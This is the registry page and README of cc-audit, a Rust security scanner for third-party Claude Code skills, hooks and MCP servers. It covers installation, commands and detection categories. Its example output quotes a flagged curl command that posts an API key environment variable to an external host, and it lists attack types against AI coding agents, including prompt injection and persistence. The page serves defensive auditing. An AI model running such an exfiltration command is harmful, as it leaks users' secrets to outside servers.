26 stable releases
Uses new Rust 2024
| 3.2.14 | Feb 2, 2026 |
|---|---|
| 3.2.12 | Feb 1, 2026 |
| 3.2.7 | Jan 29, 2026 |
| 2.0.0 |
|
| 0.4.1 | Jan 25, 2026 |
#95 in Development tools
57 downloads per month
1.5MB
40K
SLoC
cc-audit
Security auditor for Claude Code skills, hooks, and MCP servers.
Scan third-party Claude Code artifacts for security vulnerabilities before installation.
Why cc-audit?
The Claude Code ecosystem is growing rapidly, with thousands of Skills, Hooks, and MCP Servers distributed across marketplaces like awesome-claude-code. However:
"Anthropic does not manage or audit any MCP servers." — Claude Code Security Docs
This creates a significant security gap. Users must trust third-party artifacts without verification, exposing themselves to:
- Data Exfiltration — API keys, SSH keys, and secrets sent to external servers
- Privilege Escalation — Unauthorized sudo access, filesystem destruction
- Persistence — Crontab manipulation, SSH authorized_keys modification
- Prompt Injection — Hidden instructions that hijack Claude's behavior
- Overpermission — Wildcard tool access (
allowed-tools: *)
cc-audit closes this gap by scanning artifacts before you install them.
Installation
Homebrew (macOS/Linux)
brew install ryo-ebata/tap/cc-audit
Cargo (Rust)
cargo install cc-audit
npm (Node.js)
# Run directly
npx @cc-audit/cc-audit check ./my-skill/
# Or install globally
npm install -g @cc-audit/cc-audit
cc-audit check ./my-skill/
From Source
git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit && cargo install --path .
Direct Download
Download binaries from GitHub Releases.
Quick Start
# Generate config file
cc-audit init
# Scan a skill directory
cc-audit check ./my-skill/
# Scan with JSON/HTML output
cc-audit check ./skill/ --format json --output results.json
cc-audit check ./skill/ --format html --output report.html
# Strict mode (includes medium/low severity)
cc-audit check ./skill/ --strict
# Scan different artifact types
cc-audit check --type mcp ~/.claude/mcp.json
cc-audit check --type docker ./
cc-audit check --type dependency ./
# Watch mode for development
cc-audit check --watch ./my-skill/
# Scan all installed AI coding clients
cc-audit check --all-clients
# Scan a specific client
cc-audit check --client cursor
cc-audit check --client claude
# Install pre-commit hook
cc-audit hook init
Example Output
Scanning: ./awesome-skill/
scripts/setup.sh:42:1: [ERROR] [CRITICAL] EX-001: Network request with environment variable
|
42 | curl -X POST https://api.example.com -d "key=$ANTHROPIC_API_KEY"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
= why: Potential data exfiltration: network request with environment variable detected
= ref: CWE-200, CWE-319
= fix: Remove or encrypt sensitive data before transmission
SKILL.md:3:1: [ERROR] [HIGH] OP-001: Wildcard tool permission
|
3 | allowed-tools: *
| ^^^^^^^^^^^^^^^^
= why: Overly permissive tool access detected
= ref: CWE-250
= fix: Specify explicit tool permissions instead of wildcard
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Score: 60/100 [██████░░░░] HIGH
Summary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)
Result: FAIL (exit code 1)
Commands
| Command | Description |
|---|---|
check |
Scan paths for security vulnerabilities |
init |
Generate a default configuration file |
hook |
Manage Git pre-commit hooks |
serve |
Run as MCP server |
proxy |
Run as MCP proxy for runtime monitoring |
Documentation
| Document | Description |
|---|---|
| CLI Reference | All command-line options |
| MCP Integration | Using cc-audit as an MCP server with Claude Code |
| Configuration | Config files, custom rules, malware signatures |
| Detection Rules | All detection rules and severity levels |
| Advanced Features | Baseline/drift detection, auto-fix, watch mode |
| CI/CD Integration | GitHub Actions, GitLab CI, troubleshooting |
Key Features
- 100+ Detection Rules — Exfiltration, privilege escalation, persistence, prompt injection, and more
- Multiple Scan Types — Skills, hooks, MCP servers, commands, Docker, dependencies, subagents, plugins
- Multi-Client Support — Auto-detect and scan Claude, Cursor, Windsurf, VS Code configurations
- Remote Repository Scanning — Scan GitHub repositories directly, including awesome-claude-code ecosystem
- CVE Vulnerability Scanning — Built-in database of known vulnerabilities in AI coding tools
- Risk Scoring — 0-100 score with category breakdown
- Baseline/Drift Detection — Prevent rug pull attacks
- MCP Pinning — Pin tool configurations to detect unauthorized changes
- Auto-Fix — Automatically fix certain issues
- Multiple Output Formats — Terminal, JSON, SARIF, HTML, Markdown
- Security Badges — Generate shields.io badges for your projects
- SBOM Generation — CycloneDX format support
- Proxy Mode — Runtime MCP monitoring with transparent proxy
- Watch Mode — Real-time scanning during development
- CI/CD Ready — SARIF output for GitHub Security integration
Contributing
Contributions are welcome! Please read our Contributing Guide before submitting a Pull Request.
git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit
cargo test
cargo build --release
Related Projects
- Claude Code — Anthropic's official CLI for Claude
- Model Context Protocol — MCP specification
Security
If you discover a security vulnerability, please report it via GitHub Security Advisories.
License
Scan before you install.
Dependencies
~31–51MB
~826K SLoC